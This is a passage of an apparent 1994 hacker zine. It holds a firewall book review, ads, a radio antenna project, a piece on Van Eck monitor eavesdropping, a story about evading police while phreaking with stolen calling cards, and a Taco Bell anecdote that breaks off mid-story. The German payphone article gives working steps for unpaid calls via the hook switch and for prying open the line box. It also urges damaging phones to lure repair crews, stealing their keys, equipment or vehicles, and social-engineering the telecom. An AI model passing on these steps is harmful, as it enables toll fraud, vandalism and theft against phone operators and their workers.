someone with passing knowledge of Internet security who wants to learn
more explicit details about holes.  It is, in the authors' words, "not
a book on how to administer a system in a secure fashion."


FIREWALLS (Including the TCP/IP overview: pages 19-131)

What is a firewall and how is it built?(*)  If you don't know that,
then definitely get this book.  The Firewalls chapter is excellent
even for someone with a passing knowledge of firewalls or general
knowledge of what they set out to accomplish.  You might still
learn more.

In the Firewalls chapter, the authors explain the firewall philosophy
and types of firewalls.  Packet-filtering gateways rely on rule-based
packet filtering to protect the gateway from various types of attacks.
You can filter everything and achieve the same effect of disconnecting
from the Internet, you can filter everything from misbehaving sites,
you can allow only mail in, and so on.  An application-level gateway
relies on the applications set on the firewall.  Rather then let a
router filter traffic based on rules, one can strip a machine clean
and only run desired services -- and even then, more secure versions
of those services can be run.  Circuit-level gateways relay data
between the gateway and other networks.  The relay programs copy
data from inside the firewall to the outside, and log their activity.
Most firewalls on the Internet are a combination of these gateways.

Next, the authors explain how to build an application-level gateway
based on the work they have done with the research.att.com gateways.
As mentioned, this chapter is indeed very good.  They go over setting
up the firewall machines, router configuration for basic packet
filtering (such as not allowing Internet packets that appear to come
from inside your network).  They show, using the software on the
AT&T gateway as example, the general outline of proxies and give some
useful advise.  That chapter is very interesting; reading it with Bill
Cheswick's (older) paper, "The Design of a Secure Internet Gateway" makes
it even better.  The examples given, like the NFS and X proxies run on the
gateway, are also interesting by themselves.


INTERNET SECURITY (pages 133-237)

Internet security is a misleading name.  This part might also be
called "Everything else."  Most of it is a review of hacker attacks
logged by AT&T's gateway probes, and of their experience with a hacker.
But there is also a chapter dedicated to computer crime and the law --
computer crime statutes, log files as evidence, the legalities of
monitoring intruders and letting them keep their access after finding
them, and the ethics of many actions performed on the Internet; plus
an introduction to cryptography under Secure Communication over Insecure
Networks.  The later sections are good.  The explanation of several
encryption methods and short reviews of applications putting them to use
(PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the
computer crime sections are also good -- although I'm not a lawyer and
therefore cannot really comment on it, and notes that look like "5 USC
552a(b)(c)(10)" cause me to shudder.  It's interesting to note that some
administrative functions as presented in this book, what the authors call
counter-intelligence (reverse fingers and rusers) and booby traps and fake
password file are open for ethical debate.  Perhaps they are not illegal,
but counter-intelligence can surely ring the warning bells on the site being
counter-fingered if that site itself is security aware.

That said, let's move to hackers.  I refer to these as "hacker studies",
or whatever, for lack of a better name.  This is Part III (A Look
Back), which contains the methods of attacks (social engineering,
stealing passwords, etc), the Berferd incident (more on that later),
and an analysis (statistical and otherwise) of the Bell Labs gateway
logs.

Back to where we started, there is nothing new or innovative about
these chapters.  The Berferd hacker case is not new, it is mostly just
uninteresting.  The chapter is mostly a copy (they do state this) of
Bill Cheswick's paper titled "A Night with Berferd, in Which a Cracker
is Lured, Endured and Studied."  The chapter concerning probes and
door-knob twisting on the Internet (Traps, Lures, and Honey Pots)
is mostly a copy (they do not state this) of Steven Bellovin's paper
titled, "There Be Dragons".  What do we learn from the hacker-related
chapters?  Let's take Berferd: The Sendmail DEBUG hole expert.  After
mailing himself a password file and receiving it with a space after
the username, he tries to add accounts in a similar fashion.  Cheswick
calls him "flexible".  I might have chosen another F-word.  Next are
the hacker logs.  People finger.  People tftp /etc/passwd.  People try
to rlogin as bin.  There are no advanced attacks in these sections.
Compared with the scary picture painted in the Firewalls chapter --
that of the Bad Guy spoofing hostnames, flooding DNS caches, faking
NFS packets and much more -- something must have gone wrong.(**)

Still, I cannot say that this information is totally useless.  It is,
as mentioned, old.  It is available and was available since 1992
on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***)

The bottom line is that this book is, in my opinion, foremost and upmost
a Firewaller's book.  The hacker section could have been condensed
into Appendix D, a copy of the CERT advisory about computer attacks
("Don't use guest/guest.  Don't leave root unpassworded.")  It really
takes ignorance to believe that inexperienced hackers can learn "hacker
techniques" and become mean Internet break-in machines just by reading
_Firewalls and Internet Security_.  Yes, even the chapter dedicated
to trying to attack your own machine to test your security (The Hacker's
Workbench) is largely theoretical.  That is to say, it doesn't go above
comments like "attack NFS".  The probes and source code supplied there are
for programs like IP subnet scanners and so on, and not for "high-level"
stuff like ICMP bombers or similar software; only the attacks are
mentioned, not to implementation.  This is, by the way, quite
understandable and expected, but don't buy this book if you think it
will make you into some TCP/IP attacker wiz.

In summary:

THE GOOD

The Firewalls part is excellent.  The other parts not related to
hacker-tracking are good as well.  The added bonuses -- in the form
of a useful index, a full bibliography (with pointers to FTP sites),
a TCP port list with interesting comments and a great (running out
of positive descriptions here) online resources list -- are also
grand (whew).

THE BAD

The hacker studies sections, based on old (circa 1992) papers, are
not interesting for anyone with any knowledge of hacking and/or
security who had some sort of encounters with hackers.  People without
this knowledge might either get the idea that: (a) all hackers are
stupid and (b) all hackers are Berferd-style system formatters.  Based on
the fact that the authors do not make a clear-cut statement about
hiring or not hiring hackers, they just say that you should think
if you trust them, and that they generally appear not to have a total
draconian attitude towards hackers in general, I don't think this was
intentional.

THE UGLY (For the nitpickers)

There are some nasty little bugs in the book.  They're not errors
in that sense of the word; they're just kind of annoying -- if you're
sensitive about things like being called a hacker or a cracker, they'll
annoy you.  Try this: although they explain why they would use the term
"hacker" when referring to hackers (and not "eggsucker", or "cracker"),
they often use terms like "Those With Evil Intention".  Or, comparing
_2600 Magazine_ to the Computer underground Digest.

(*) From the Firewalls FAQ <fwalls-faq@tis.com>:
    ``A firewall is any one of several ways of protecting one
    network from another untrusted network. The actual mechanism
    whereby this is accomplished varies widely, but in
    principle, the firewall can be thought of as a pair of
    mechanisms: one which exists to block traffic, and the other
    which exists to permit traffic. Some firewalls place a
    greater emphasis on blocking traffic, while others emphasize
    permitting traffic.''

(**) This would be a great place to start a long and boring discussion
     about different types of hackers and how security (including firewalls)
     affect them.  But... I don't think so.

(***) ftp://research.att.com:/dist/internet_security/firewall.book also
      contains, in text and PostScript, the list of parts, chapters and
      sections in the book, and the Preface section.  For that reason,
      those sections weren't printed here.
      All the papers mentioned in this review can be found on that FTP
      site.

------------------------------------------------------------------------------

Announcing Bellcore's Electronic Information Catalog for Industry
Clients...

To access the online catalog:

    telnet info.bellcore.com
    login: cat10

    or dial 201-829-2005
       annex: telnet info
       login: cat10

[Order up some E911 Documents Online!]

------------------------------------------------------------------------------

TTTTT H   H EEEEE
  T   H   H E
  T   HHHHH EEEEE
  T   H   H E
  T   H   H EEEEE

             CCC  U   U RRRR  M   M U   U DDDD   GGG  EEEEE  OOO  N   N
            C   C U   U R   R MM MM U   U D   D G   G E     O   O NN  N
            C     U   U RRRR  M M M U   U D   D G     EEEEE O   O N N N
            C   C U   U R  R  M   M U   U D   D G  GG E     O   O N  NN
             CCC   UUU  R   R M   M  UUU  DDDD   GGG  EEEEE  OOO  N   N

       Bill Clinton promised good health care coverage for everyone.
          Bill Clinton promised jobs programs for the unemployed.
Bill Clinton promised that everyone who wanted could serve in the military.
           Bill Clinton promised a lot.  So does the Curmudgeon.
                 But unlike Bill Clinton, we'll deliver...

For only $10 a year (12 issues) you'll get alternative music reviews and
interviews, political reporting, anti-establishment features and
commentary, short fiction, movie reviews, book reviews, and humor.  Learn
the truth about the Gulf War, Clipper, and the Selective Service System.
Read everything you wanted to know about bands like the Offspring, R.E.M.,
the Cure, Porno for Pyros, Pearl Jam, Dead Can Dance, Rhino Humpers, and
Nine Inch Nails.  Become indoctrinated by commentary that just might change
the way you think about some things.  Subscribe to the Curmudgeon on paper for
$10 or electronically for free.  Electronic subscribers don't get
everything that paying subscribers do like photos, spoof ads, and some
articles.

Paper: send $10 check or money order to the Curmudgeon
     4505 University Way N.E.
     Box 555
     Seattle, Washington
       98105
   Electronic: send a request to rodneyl@u.washington.edu

------------------------------------------------------------------------------

 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 % The Journal Of American Underground Computing - ISSN 1074-3111 %
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

 Computing - Communications - Politics - Security - Technology - Humor
 -Underground - Editorials - Reviews - News - Other Really Cool Stuff-

 Published Quarterly/Semi-Quarterly By Fennec Information Systems
 This is one of the more popular new electronic publications. To
 get your free subscription, please see the addresses below.
 Don't miss out on this newsworthy publication. We are getting
 hundreds of new subscriptions a month. This quarterly was promoted
 in Phrack Magazine. If you don't subscribe, you're only cheating
 yourself. Have a great day...and a similar tomorrow

 * Coming soon * A Windows-based help file containing all of the issues
                 of the magazine as well as extensive bio's of all of the
                 editors.

 Subscription Requests:  sub@fennec.com
 Comments to Editors  :  editors@fennec.com
 Back issues via Ftp  :  etext.archive.umich.edu  /pub/Zines/JAUC
                         fc.net   /pub/tjoauc

 Submissions          :  submit@fennec.com
 Finger info          :  dfox@fc.net and kahuna@fc.net

------------------------------------------------------------------------------

        Make the best out of your European pay telephone
           by Onkel Dittmeyer, onkeld@ponton.hanse.de

      -----------------------------------------------------

  Okay guys and girls, let's come to a topic old like the creation
but yet never revealed. European, or, to be more exact, German pay
phone technology. Huh-huh.

  There are several models, round ones, rectangular ones, spiffy
looking ones, dull looking ones, and they all have one thing in
common: If they are something, they are not what the American reader
might think of a public pay telephone, unlike it's U.S. brothers,
the German payphones always operate off a regular customer-style
telephone line, and therefore they're basically all COCOTS, which
makes it a lot easier to screw around with them.

  Let's get on with the models here. You are dealing with two
classes; coin-op ones and card-op ones. All of them are made by
Siemens and TELEKOM. The coin-op ones are currently in the process
of becoming extinct while being replaced by the new card-op's, and rather
dull. Lacking all comfort, they just have a regular 3x4 keypad,
and they emit a cuckoo tone if you receive a call. The only way to
tamper with these is pure physical violence, which is still easier
than in the U.S.; these babies are no fortresses at all. Well, while
the coin-op models just offer you the opportunity of ripping off
their money by physically forcing them open, there is a lot more
fun involved if you're dealing with the card babies. They are really
spiffy looking, and I mean extraordinary spiffy. Still nothing
compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line
pixel-oriented LCD readout displays the pure K-Radness of it's
inventors. Therefore it is equipped with a 4x4 keypad that has a lot
of (undocumented) features like switching the mother into touch-tone
mode, redial, display block etc. Plus, you can toggle the readout
between German, English, and French. There are rumors that you can
put it into Mandarin as well, but that has not been confirmed yet.

  Let's get ahead. Since all payphones are operating on a regular
line, you can call them up. Most of them have a sign reading their
number, some don't. For those who don't, there is no way for you to
figure out their number, since they did not invent ANI yet over here
in the country famous for its good beer and yodel chants. Well, try
it. I know you thought about it. Call it collect. Dialing 010 will
drop you to a long-distance operator, just in case you didn't know.
He will connect the call, since there is no database with all the
payphone numbers, the payphone will ring, you pick up, the operator
will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh?

  This would not be Phrack if there would be no way to screw it.
If you examine the hook switch on it closely, you will figure out
that, if you press it down real slow and carefully, there are two
levels at whom it provokes a function; the first will make the phone
hang up the line, the second one to reset itself. Let me make this
a little clearer in your mind.

                       -----         <--- totally released
                         |
                         |
                         |           <--- hang up line
 press to this level --> |
                         |           <--- reset
                         |
                       -----         <--- totally hung up

  Involves a little practice, though. Just try it. Dial a number
it will let you dial, like 0130, then it will just sit there and
wait for you to dial the rest of the number. Start pressing down
the hookswitch really slow till the line clicks away into suspense,
if you release it again it will return you to the dial tone and
you are now able to call numbers you aren't supposed to call, like
010 (if you don't have a card, don't have one, that's not graceful),
or 001-212-456-1111. Problem is, the moment the other party picks
up, the phone will receive a charge subtraction tone, which is a
16kHz buzz that will tell the payphone to rip the first charge unit,
30 pfennigs, off your card, and if you don't have one inserted and
the phone fails to collect it, it will go on and reset itself
disconnecting the line. Bad luck. Still good enough to harass your
favorite fellas for free, but not exactly what we're looking for,
right? Try this one. Push the hook lever to the suspension point,
and let it sit there for a while, you will have to release it a
bit every 5 seconds or so, or the phone will reset anyway. If you
receive a call while doing this, a buzz will appear on the line.

  Upon that buzz, let the lever go and you'll be connected, and
the cuckoo tone will be shut up! So if you want to receive a collect
call, this is how you do it. Tell the operator you accept the charges,
and talk away. You can use this method overseas, too: Just tell your
buddy in the states to call Germany Direct (800-292-0049) and make
a collect call to you waiting in the payphone, and you save a cool
$1.17 a minute doing that. So much for the kids that just want to
have some cheap fun, and on with the rest.

  Wasting so much time in that rotten payphone, you probably
noticed the little black box beneath the phone. During my, erm,
research I found out that this box contains some fuses, a standard
Euro 220V power connector, and a TAE-F standard phone connector.
Completing the fun is the fact that it's extremely easy to pry it
open. The TAE-F plug is also bypassing the phone and the charge
collection circuits, so you can just use it like your jack at home.
Bring a crowbar and your laptop, or your Pentium tower, power it over
the payphone and plug your Dual into the jack. This way you can even
run a board from a payphone, and people can download the latest
WaReZzzZzz right from the booth. It's preferable to obtain a key for
the lock of the box, just do some malicious damage to it (yes, let
the animal take control), and call Telekom Repairs at 1171 and they
will come and fix it. Since they always leave their cars unlocked,
or at least for the ones I ran across, you can either take the whole
car or all their k-rad equipment, manuals, keys, and even their lunch
box. But we're shooting off topic here. The keys are usually general
keys, means they fit on all payphones in your area. There should also
be a nationwide master key, but the German Minister of Tele-
communications is probably keeping that one in his desk drawer.

  The chargecards for the card-op ones appear to have a little chip
on them, where each charge unit is being deducted, and since no-one
could figure out how it works, or how to refill the cards or make a
fake one, but a lot of German phreaks are busy trying to figure that
out.

  A good approach is also social-engineering Telekom so they turn
off the charge deduction signal (which doesn't mean the call are free,
but the buzz is just not transmitted any more) so the phone doesn't
receive a signal to charge you any money no matter where you call.
The problem with this method is that the world will spread in the
neighborhood that there is a payphone where you can call for free,
and therefore it will be so crowded that you can't use it, and
the phone pals will catch up fast. It's fun though, I tried it, and
I still get free drinks at the local pub for doing it.

  Another k-rad feature on them is the built-in modem that they use
to get their software. On a fatal error condition they appear to dial
a telecom number and download the latest software just how their ROM
commands them to do. We will shortly take a phone, install it some-
where else and figure out where it calls, what the protocol is and
what else is being transmitted, but that will probably be in another
Phrack.

  If you found out anything that might be of interest, you are
welcome to mail it to onkeld@ponton.hanse.de using the public key
beneath. Unencrypted mail will be killed since ponton.hanse.de is
run by a paranoid bitch that reads all traffic just for the hell
of it, and I don't want the phedzZz to come and beat me over the
head with a frozen chunk o' meat or worse.

  Stay alert, watch out and have fun...

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a

mQCNAize9DEAAAEEAKOb5ebKYg6cAxaiVT/H5JhCqgNNDHpkBwFMNuQW2nGnLMvg
Q0woIxrM5ltnnuCBJGrGNskt3IMXsav6+YFjG6IA8YRHgvWEwYrTeW2tniS7/dXY
fqCCSzTxJ9TtLAiMDBgJFzOIUj3025zp7rVvKThqRghLx4cRDVBISel/bMSZAAUR
tChPbmtlbCBEaXR0bWV5ZXIgPG9ua2VsZEBwb250b24uaGFuc2UuZGU+
=b5ar
-----END PGP PUBLIC KEY BLOCK-----
------------------------------------------------------------------------------

      _   _                                                          _   _
     ((___))                INFORMATION IS JUNK MAIL                ((___))
     [ x x ]                                                        [ x x ]
      \   /                    cDc communications                    \   /
      (' ')             -cDc- CULT OF THE DEAD COW -cDc-             (' ')
       (U)                                                            (U)
  deal with it,        presents unto you 10 phat t-files,        deal with it,
   S U C K E R                fresh for July 1994:                S U C K E R

    New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994:

 _________________________________/Text Files\_________________________________

261: "Interview with Greta Shred" by Reid Fleming.  Reid conducts an in-depth
interview with the editor of the popular 'zine, _Mudflap_.

262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile.  Paper
presented for the 1993 National Popular Culture Association meeting in New
Orleans.

263: "What Color Is the Sky in Your World?" by Tequila Willy.  Here's your
homework, done right for you by T. "Super-Brain" Willy.

264: "Chicken Hawk" by Mark E. Dassad.  Oh boy.  Here's a new watermark low
level of depravity and sickness.  If you don't know what a "chicken hawk" is
already, read the story and then you'll understand.

265: "Eye-r0N-EE" by Swamp Ratte'.  This one's interesting 'cause only about
half-a-dozen or so lines in it are original.  The rest was entirely stuck
together from misc. files on my hard drive at the time.  Some art guy could say
it's a buncha post-this&that, eh?  Yep.

266: "Interview with Barbie" by Clench.  Barbie's got her guard up.  Clench
goes after her with his rope-a-dope interview style.  Rope-a-dope, rope-a-dope.
This is a boxing reference to a technique mastered by The Greatest of All Time,
Muhamed Ali.

267: "About a Boy" by Franken Gibe.  Mr. Gibe ponders a stolen photograph.
Tiny bunnies run about, unhindered, to find their own fate.

268: "Mall Death" by Snarfblat.  Story about a Dumb Girl[TM].  Are you
surprised?

269: "Prophile: Future History" by THE NIGHTSTALKER.  It's the future, things
are different, but the Master Hacker Dude lives on.

270: "Time out for Pop" by Malcolm D. Moore.  Sad account of a hopless-pop.

 __________________________________/cDc Gnuz\__________________________________

     "And that no man might buy or sell, save he that had the mark, or the name
of the Cow, or the number of his name.  Here is wisdom.  Let him that hath
understanding count the number of the Cow: for it is the number of a man; and
his number is eight billion threescore and seven million nine hundred fourty-
four thousand three hundred threescore and two.  So it is written."  -Omega


Yowsah, yowsah, yowsah.  JULY once again, the super-hooray month which marks
cDc's 8th year of existence.  Outlasting everyone to completely rule and
dominate all of cyberspace, blah blah blah.  Yeah, think a special thought
about cDc's significance in YOUR life the next time you go potty.  Name your
firstborn child after me, and we'll call it karmicly even, pal.  My name is
Leroy.


We're always taking t-file submissions, so if you've got a file and want to
really get it out there, there's no better way than with cDc.  Upload text to
The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post
office box in Lubbock, TX.  No song lyrics and bad poetry please; we'll leave
that to the no-class-havin', bottom-feeder e-shoveling orgs. out there.


News item of the month, as found by Count Zero:

"ROTTING PIG FOUND IN DITCH

VERDEN, OKLAHOMA - Responding to a tip from an employee, Verden farmer Bill
McVey found a rotting pig in a ditch two miles north of town.  Farmer McVey
reported the pig to the authorities, because you cannot, legally, just leave a
dead pig in a ditch.  You must dispose of your deceased livestock properly.
There are companies that will take care of this for you.  As for proper
disposal of large dead animals, McVey contracts with Used Cow Dealer."

                                      "...and the rivers ran red with the bl00d
                                            of the Damned and the Deleted..."
                                                        -Dem0nSeed

S. Ratte'
cDc/Editor and P|-|Ear13zz |_3@DeRrr
"We're into t-files for the groupies and money."
Middle finger for all.

Write to: cDc communications, P.O. Box 53011, Lubbock, TX  79453.
Internet: sratte@phantom.com.
ALL cDc FILES LEECHABLE FROM FTP.EFF.ORG IN pub/Publications/CuD/CDC.
 _____________________________________________________________________________

  cDc Global Domination Update #16-by Swamp Ratte'-"Hyperbole is our business"
  Copyright (c) 1994 cDc communications.  All Rights Reserved.

------------------------------------------------------------------------------

===[ Radio Modification Project ]===========================================>

        Tuning in to Lower Frequency Signals              June 26, 1994

====================================================[ By: Grendel / 905 ]===>

          The lower frequency regions of the radio spectrum are often
        ignored  by ham'ers, pirates, and DX'ers alike due to the
        relatively little known ways of tuning in. The following article
        will detail how to construct a simple-made antenna to tune in
        to the LF's and show how to adjust an amateur band type radio
        to receive the desired signals.

       ___________
       \         /
        \/:    \/
        / .     \
        \_______/he lower frequency spectrum has been made to include
        the  very low  frequency  ("VLF" 2 kHz to 30 kHz)  band and a
        small part of the medium frequency ("MF" 300 - 500 kHz) band.
          For our purposes, a suitable receiver must be able to cover
        the 2 kHz to 500 kHz  range as well as being calibrated at 10
        kHz intervals (standard). The receiver must also be capable of
        covering AM and CW broadcasts. For best capabilities, the
        receiver  should also be able to  cover LSB ("lower side band")
        and USB ("upper side band").

        The Receiving System
        `'`'`'`'`'`'`'`'`'`'
          The receiver I use consists of a standard amateur HF ("High
        Frequency") band receiver adjusted between the 3,500 and 4,000
        kHz bands.  This causes the  receiver to act as a tuneable IF
        ("Intermediate Frequency") and also as demodulator.  You will
        also require a wideband LF ("Low Frequency") converter  which
        includes a 3,500 kHz crystal oscillator. See Fig. 1:

           .==[ Fig 1. Block Diagram ]============================.
           |  _____                                               |
           |  \ANT/                                               |
           |   \./        crystal                                 |
           |    |      ______|______       ____________           |
           |    `-----| 2 - 500 kHz |     | 3-4000 kHz |          |
           |          |  Converter* |--~--| IF Receiver|---OUTPUT |
           |    .-----|_____________|     |____________|          |
           |    |                                                 |
           |   GND                                                |
           |______________________________________________________|

             *The converter is a circuit board type 80D/L-101/PCB
              available from L.F. Engineering Co, 17 Jeffry Road,
              East Haven CT, 06513 for $43 US including S & H.One
              may be  constructed to work with your receiver (but
              at a higher price no doubt).

          Phono jack plugs and sockets are  used for the interconnections
        throughout the receiving  system and the  converter and
        receiver (~) are connected with RG58 coax cable of no greater
        length than 4 ft.
          When tuning, the station  frequency is measured by deducting
        3,500 kHz from the scale on the main  receiver (ie. 340 kHz =
        3,840 kHz on  the main  receiver, 120 = 3,620 kHz, 95 = 3,595
        kHz, etc.)

        The Ferrite End-fed Antenna
        `'`'`'`'`'`'`'`'`'`'`'`'`'`
          This is a small antenna designed to tune between 95 kHz and
        500 kHz. It consists of a coil wound around a ferrite rod, with
        a 4 ft. lead.

                Materials:
                  o  7 7/8" x 3/8" ferrite rod
                  o  5" 24 SWG double cotton covered copper wire
                  o  2 PLASTIC coated terry clips
                  o  a wood or plastic base (8 1/2" x .8" x .5")
                  o  2 standard, two-gang 500 pF tuning capacitors
                  o  a plastic plate (preferably 2" high)

------------------------------------------------------------------------------

 -- A Few Things on Van Eck's Method of Eavesdroping --
  Opticon the Disassembled - UPi

 Dr Wim Van Eck, was the  one who  developed the  anonymous method for
eavesdroping  computers  ( and, apparently, not  only ) from  distance,
in  the  laboratories of  Neher, Holland. This  method is  based on the
fact that monitors do transmit electromagnetic radiations. As a device,
it is not too  complex  and it can be  constructed from an  experienced
electronics  phreak. It  uses a simple-direction  antenna  which  grabs
monitor  signals from  about 800 meters away. Simplified schematics are
available from Consumertronics.

 TEMPEST stands for Transient  ElectroMagnetic  Pulse Emanation STandard.
It concerns the quantity of  electromagnetic radiations from monitors and
televisions, although  they  can also  be  detected on  keyboards, wires,
printers and central units. There are some  security levels in which such
radiations are  supposed  to be  untraceable by  Van  Eck  systems. Those
security  levels or  standards, are  described  thoroughly in a technical
exposition  called  NACSIM  5100A, which  has been  characterized by  NSA
classified.

 Variations of the  voltage of the electrical current, cause electromagnetic
pulses in the form of  radio waves. In cathode ray  tube ( C.R.T. ) devices,
such as  televisions and monitors, a source of  electrons scans the internal
surface and activates  phosphore. Whether or not the scanning is interlaced or
non-interlaced, most  monitors  transmit  frequencies  varying from 50 to 75
Mhz per second. They also  transmit harmonic  frequencies, multiplies of the
basic frequencies; for example a transmitter with signal of 10 Mhz per second
will  also  transmit  waves of 20, 30, 40 etc. Mhz. Those  signals are
weaker  because the  transmiter itself  effaces them. Such variations in the
voltage is what the Van Eck system receives and analyzes.

 There are ways to prevent or make it harder for someone to monitor
your  monitor. Obviously  you cannot  place your  computer system
underground and cover it with a  Faraday cage or a  copper shield
( If your case is  already that, then you know more about Van Eck
than I do ). What else ?

 (1) Certain computers, such as Wang's, prevent such divulges;
 give preference to them.

 (2) Place your monitor into a grounded metal box, 1.5 cm thick.

 (3) Trace your tracer(s). They gonna panic.

 (4) Increase of the  brightness and  lowering of the contrast
 reduces TEMPEST's power. Metal objects, like bookshelves,
 around the room, will also help a little bit.

 (5) Make sure that two or more monitors are transmitting at the same
 frequency and let them operate simultaneously; this will confuse
 Van Eck systems.

 (6) Buy or make on your own, a device which will transmit noise
 at your monitor's frequency.

 (7) Act naturally. That is:

 (a) Call IRC, join #hack and never mumble a single word.

 (b) Read only best selling books.

 (c) Watch television at least 8 hours a day.

 (d) Forget altruism; there is only you, yourself
     and your dick/crack.

 (8) Turn the monitor off.

------------------------------------------------------------------------------

                        -Almost Busted-
                         By: Deathstar

        It all started one week in the last month of summer.  Only my brother
and I were at the house for the whole week, so I did whatever I wanted.
Every night, I would phreak all night long.  I would be either at a payphone
using AT&Tz, or at home sitting on a conference.  I would be on the phone
till at least four or five in the morning.  But one night, my luck was running
thin, and I almost phreaked for the last time.  I was at a payphone, using
cards.  I had been there since around twelve midnight..  The payphone was
in a shopping center with a supermarket and a few other stores.  Most every
thing closed at eleven.. Except for the nearby gas station.  Anyway, I was
on the phone with only one person that night.  I knew the card would be dead
by the end of the night so I went ahead and called him on both of his lines
with both of the payphones in the complex with the same card.  I had talked
for hours.  It started to get misty and hard to see.  Then, I noticed a car
of some kind pulling into the parking lot.  I couldn't tell what kind of
car it was, because it was so dark.  The car started pulling up to me, and
when it was around twenty feet away I realized it was a police car.  They
got on the loudspeaker and yelled "Stay where you are!".  I dropped the
phone and ran like hell past the supermarket to the edge of the complex.
I went down a bike path into a neighborhood of townhouses.  Running across
the grass, I slipped and fell about two or three times.  I knew they were
following me, so I had to hide.  I ran to the area around the back of
the supermarket into a forest.  I smacked right into a fence and fell
on the ground.  I did not see the fence since it was so dark.  Crawling a
few feet, I laid down and tried to cover my body with some leaves and
dirt to hide.  I was wearing an orange shirt and white shorts.  I laid
as still as I could, covered in dirt and leaves.  I could hear the police
nearby.  They had flashlights and were walking through the forest looking
for me.  I knew I would get busted.  I tried as hard as I could to keep
from shaking in fear.  I lay there for around thirty minutes.  Bugs were
crawling around on my legs biting me.  I was itching all over.  I couldn't
give up though, because if they caught me I knew that would be the end
of my phreaking career.  I was trying to check if they were still looking
for me, because I could not hear them.  Just as I was about to make a run
for it, thinking they were gone I heard a police radio.  I sat tight again.
For another hour, I lay there until finally I was sure they were gone.  I
got up and started to run.  I made my way through the neighborhood to my
house.  Finally I got home.  It was around five thirty a.m.  I was filthy.
The first thing I did was call the person I was talking to on the payphone
and tell him what happened.  Then, I changed clothes and cleaned myself up.
I checked my vmb to find that a conference was up.  I called it, and told
my story to everyone on.

 I thought that was the end of my confrontation with the police, but I
was wrong.  The next day I had some people over at my house.  Two or Three
good friends.  One of them said that there was a fugitive loose in our
town.  We were bored so we went out in the neighborhood to walk around
and waste time.  Hardly anyone was outside, and police cars were going
around everywhere.  One guy did leave his house but he brought a baseball
bat with him.  We thought it was funny.  Anyway, we soon got bored and
went back home.  Watching tv, we turned to the news.  They had a Report
about the Fugitive.  We watched.  It showed a picture of the shopping
center I was at.  They said "One suspect was spotted at this shopping
center last night at around four thirty in the morning.  The officer
is around ninety five percent sure that the suspect was the fugitive.
He was wearing a orange shirt and white shorts, and ran when approached."
I then freaked out.  They were searching my neighborhood for a fugitive
that didn't exist!  I called back the guy I was talking to the night
before and told him, and then told everyone that was on the conference
the night before.  It ended up that the fugitives never even entered
our state.  They were caught a week later around thirty miles from
the prison they escaped from.  Now I am known by two nicknames. "NatureBoy"
because everyone says I communed with nature for a hour and a half hiding
from the police, and "The Fugitive" for obvious reasons.  Anywayz, That's
how I was almost busted..

-DS

------------------------------------------------------------------------------

The following is a *true* story.  It amused the hell out of me while it
was happening.  I hope it isn't one of those "had to be there" things.
Copyright 1994 Captain Sarcastic, all rights reserved.

On my way home from the second job I've taken for the extra holiday ca$h I
need, I stopped at Taco Bell for a quick bite to eat.  In my billfold is
a $50 bill and a $2 bill.  That is all of the cash I have on my person.
I figure that with a $2 bill, I can get something to eat and not have to
worry about people getting pissed at me.

ME:  "Hi, I'd like one seven layer burrito please, to go."
IT:  "Is that it?"
ME:  "Yep."
IT:  "That'll be $1.04, eat here?"
ME:  "No, it's *to* *go*."  [I hate effort duplication.]

At his point I open my billfold and hand him the $2 bill.  He looks at it
kind of funny and

IT:  "Uh, hang on a sec, I'll be right back."

He goes to talk to his manager, who is still within earshot.  The
following conversation occurs between the two of them.

IT:  "Hey, you ever see a $2 bill?"
MG:  "No.  A what?"
IT:  "A $2 bill.  This guy just gave it to me."
MG:  "Ask for something else, THERE'S NO SUCH THING AS A $2 BILL." [my emp]
IT:  "Yeah, thought so."

He comes back to me and says

IT:  "We don't take these.  Do you have anything else?"
ME:  "Just this fifty.  You don't take $2 bills?  Why?"
IT:  "I don't know."
ME:  "See here where it says legal tender?"
IT:  "Yeah."
ME:  "So, shouldn't you take it?"
IT:  "Well, hang on a sec."

He goes back to his manager who is watching me like I'm going to
shoplift, and

IT:  "He says I have to take it."
MG:  "Doesn't he have anything else?"
IT:  "Yeah, a fifty.  I'll get it and you can open the safe and get change."
MG:  "I'M NOT OPENING THE SAFE WITH HIM IN HERE."  [my emp]
IT:  "What should I do?"
MG:  "Tell him to come back later when he has REAL money."
IT:  "I can't tell him that, you tell him."
MG:  "Just tell him."
IT:  "No way, this is weird, I'm going in back."

The manager approaches me and says

MG:  "Sorry, we don't take big bills this time of night."  [it was 8pm and
      this particular Taco Bell is in a well lighted indoor mall with 100
      other stores.]
ME:  "Well, here's a two."
MG:  "We don't take *those* either."
ME:  "Why the hell not?"
MG:  "I think you *know* why."
ME:  "No really, tell me, why?"
MG:  "Please leave before I call mall security."
ME:  "Excuse me?"
MG:  "Please leave before I call mall security."
ME:  "What the hell for?"
MG:  "Please, sir."
ME:  "Uh, go ahead, call them."
MG:  "Would you please just leave?"
ME:  "No."
MG:  "Fine, have it your way then."
ME:  "No, that's Burger King, isn't it?"

At this point he BACKS away from me and calls mall security on the phone
around the corner.  I have two people STARING at me from the dining area,
and I begin laughing out loud, just for effect.  A few minutes later this
45 year oldish guy comes in and says [at the other end of counter, in a
whisper]

SG:  "Yeah, Mike, what's up?"
MG:  "This guy is trying to give me some [pause] funny money."
SG:  "Really?  What?"
MG:  "Get this, a *two* dollar bill."
SG:  "Why would a guy fake a $2 bill?"  [incredulous]
MG:  "I don't know?  He's kinda weird.  Says the only other thing he has is
      a fifty."
SG:  "So, the fifty's fake?"
MG:  "NO, the $2 is."
SG:  "Why would he fake a $2 bill?"
MG:  "I don't know.  Can you talk to him, and get him out of here?"
SG:  "Yeah..."

Security guard walks over to me and says

SG:  "Mike here tells me you have some fake bills you're trying to use."
ME:  "Uh, no."
SG:  "Lemme see 'em."
ME:  "Why?"
SG:  "Do you want me to get the cops in here?"

At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so
I said

